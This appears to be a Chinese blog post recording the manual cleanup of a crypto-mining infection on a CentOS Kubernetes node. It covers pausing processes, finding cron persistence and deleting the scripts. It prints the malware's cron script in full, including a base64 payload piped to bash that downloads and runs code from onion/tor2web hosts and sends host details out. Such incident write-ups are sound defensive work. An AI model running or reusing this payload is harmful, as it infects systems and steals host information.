共计 3450 个字符,预计需要花费 9 分钟才能阅读完成。
背景
新接手了个环境,共事交接时说这些机器中过挖矿病毒还没重装,我 TM。。。
线上环境不好动,只能手动查杀了。
操作系统如下:
[root@k8s-node7 ~]# cat /etc/redhat-release
CentOS Linux release 7.5.1804 (Core)
过程
ssh 下来,ps -ef 看到如下:
手动 kill 掉过程,很快会生成新的,猜想有守护过程。用 STOP 信号让它进行。
[root@k8s-node7 ~]# kill -STOP 165224
[root@k8s-node7 ~]# kill -STOP 223135查看定时工作清理
[root@k8s-node7 ~]# crontab -l
8 * * * * /root/.systemd-service.sh > /dev/null 2>&1 &
[root@k8s-node7 ~]# cat /root/.systemd-service.sh
#!/bin/bash
exec &>/dev/null
echo tndtCwuLieAr5wvPgknqmFZpHZWrMf+G9UhUYqmI2z2sX3NaL+fIvmN+PKEvAKMk
echo dG5kdEN3dUxpZUFyNXd2UGdrbnFtRlpwSFpXck1mK0c5VWhVWXFtSTJ6MnNYM05hTCtmSXZtTitQS0V2QUtNawpleGVjICY+L2Rldi9udWxsCmV4cG9ydCBQQVRIPSRQQVRIOiRIT01FOi9iaW46L3NiaW46L3Vzci9iaW46L3Vzci9zYmluOi91c3IvbG9jYWwvYmluOi91c3IvbG9jYWwvc2JpbgoKZD0kKGdyZXAgeDokKGlkIC11KTogL2V0Yy9wYXNzd2R8Y3V0IC1kOiAtZjYpCmM9JChlY2hvICJjdXJsIC00ZnNTTGtBLSAtbTIwMCIpCnQ9JChlY2hvICJpNjJobW56dGZwendyaGpnMzRtNnJ1eGVtNW9lMzZudWx6bXhjZ2JkYmtpYWNldWJwcmt0YTdhZCIpCgpzb2NreigpIHsKbj0oZG9oLmRlZmF1bHRyb3V0ZXMuZGUgZG5zLmhvc3R1eC5uZXQgdW5jZW5zb3JlZC5sdXgxLmRucy5uaXhuZXQueHl6IGRucy5ydWJ5ZmlzaC5jbiBkbnMudHduaWMudHcgZG9oLmNlbnRyYWxldS5waS1kbnMuY29tIGRvaC5kbnMuc2IgZG9oLWZpLmJsYWhkbnMuY29tIGZpLmRvaC5kbnMuc25vcHl0YS5vcmcgZG5zLmZsYXR1c2xpZmlyLmlzIGRvaC5saSBkbnMuZGlnaXRhbGUtZ2VzZWxsc2NoYWZ0LmNoKQpwPSQoZWNobyAiZG5zLXF1ZXJ5P25hbWU9cmVsYXkudG9yMnNvY2tzLmluIikKcz0kKCRjIGh0dHBzOi8vJHtuWyQoKFJBTkRPTSUxMCkpXX0vJHAgfCBncmVwIC1vRSAiXGIoWzAtOV17MSwzfVwuKXszfVswLTldezEsM31cYiIgfHRyICcgJyAnXG4nfGdyZXAgLUV2IFsuXTB8c29ydCAtdVJ8aGVhZCAtMSkKfQoKZmV4ZSgpIHsKZm9yIGkgaW4gLiAkSE9NRSAvdXNyL2JpbiAkZCAvdmFyL3RtcCA7ZG8gZWNobyBleGl0ID4gJGkvaSAmJiBjaG1vZCAreCAkaS9pICYmIGNkICRpICYmIC4vaSAmJiBybSAtZiBpICYmIGJyZWFrO2RvbmUKfQoKdSgpIHsKc29ja3oKZj0vaW50LiQodW5hbWUgLW0pCng9Li8kKGRhdGV8bWQ1c3VtfGN1dCAtZjEgLWQtKQpyPSQoY3VybCAtNGZzU0xrIGNoZWNraXAuYW1hem9uYXdzLmNvbXx8Y3VybCAtNGZzU0xrIGlwLnNiKV8kKHdob2FtaSlfJCh1bmFtZSAtbSlfJCh1bmFtZSAtbilfJChpcCBhfGdyZXAgJ2luZXQgJ3xhd2sgeydwcmludCAkMid9fG1kNXN1bXxhd2sgeydwcmludCAkMSd9KV8kKGNyb250YWIgLWx8YmFzZTY0IC13MCkKJGMgLXggc29ja3M1aDovLyRzOjkwNTAgJHQub25pb24kZiAtbyR4IC1lJHIgfHwgJGMgJDEkZiAtbyR4IC1lJHIKY2htb2QgK3ggJHg7JHg7cm0gLWYgJHgKfQoKZm9yIGggaW4gdG9yMndlYi5pbiB0b3Iyd2ViLml0IG9uaW9uLmZvdW5kYXRpb24gb25pb24uY29tLmRlIG9uaW9uLnNoIHRvcjJ3ZWIuc3UgdG9yMndlYi5pbwpkbwppZiAhIGxzIC9wcm9jLyQoaGVhZCAtMSAvdG1wLy5YMTEtdW5peC8wMSkvc3RhdHVzOyB0aGVuCmZleGU7dSAkdC4kaApscyAvcHJvYy8kKGhlYWQgLTEgL3RtcC8uWDExLXVuaXgvMDEpL3N0YXR1cyB8fCAoY2QgL3RtcDt1ICR0LiRoKQpscyAvcHJvYy8kKGhlYWQgLTEgL3RtcC8uWDExLXVuaXgvMDEpL3N0YXR1cyB8fCAoY2QgL2Rldi9zaG07dSAkdC4kaCkKZWxzZQpicmVhawpmaQpkb25lCg==|base64 -d|bash
[root@k8s-node7 ~]# rm -f !$
rm -f /root/.systemd-service.sh而后持续清理 /var/spoon/cron/,/etc/crontab,/etc/cron* 等目录或文件,
[root@k8s-node7 crontabs]# cd /etc/cron.d
[root@k8s-node7 cron.d]# ls
0systemd-service
[root@k8s-node7 cron.d]# cat 0systemd-service
9 * * * * root /opt/systemd-service.sh > /dev/null 2>&1 &
[root@k8s-node7 cron.d]# pwd
/etc/cron.d
[root@k8s-node7 cron.d]# rm -f 0systemd-service
[root@k8s-node7 ~]# ll -d /etc/cron.*
drwxr-xr-x. 2 root root 4096 3 月 10 11:01 /etc/cron.d
drwxr-xr-x. 2 root root 4096 12 月 18 15:31 /etc/cron.daily
-rw-------. 1 root root 0 4 月 11 2018 /etc/cron.deny
drwxr-xr-x. 2 root root 4096 9 月 25 2019 /etc/cron.hourly
drwxr-xr-x. 2 root root 4096 6 月 10 2014 /etc/cron.monthly
drwxr-xr-x. 2 root root 4096 6 月 10 2014 /etc/cron.weekly
[root@k8s-node7 ~]# ll -d /etc/cron.*/*
-rwx------. 1 root root 219 4 月 11 2018 /etc/cron.daily/logrotate
-rwxr-xr-x. 1 root root 392 4 月 11 2018 /etc/cron.hourly/0anacron
-rwxr-xr-x. 1 root root 191 4 月 11 2018 /etc/cron.hourly/mcelog.cron
同时查看开机启动目录等,一一清理,这时候把之前 STOP 的过程 kill 掉,察看一段时间,看看是否还会自启。
正文完
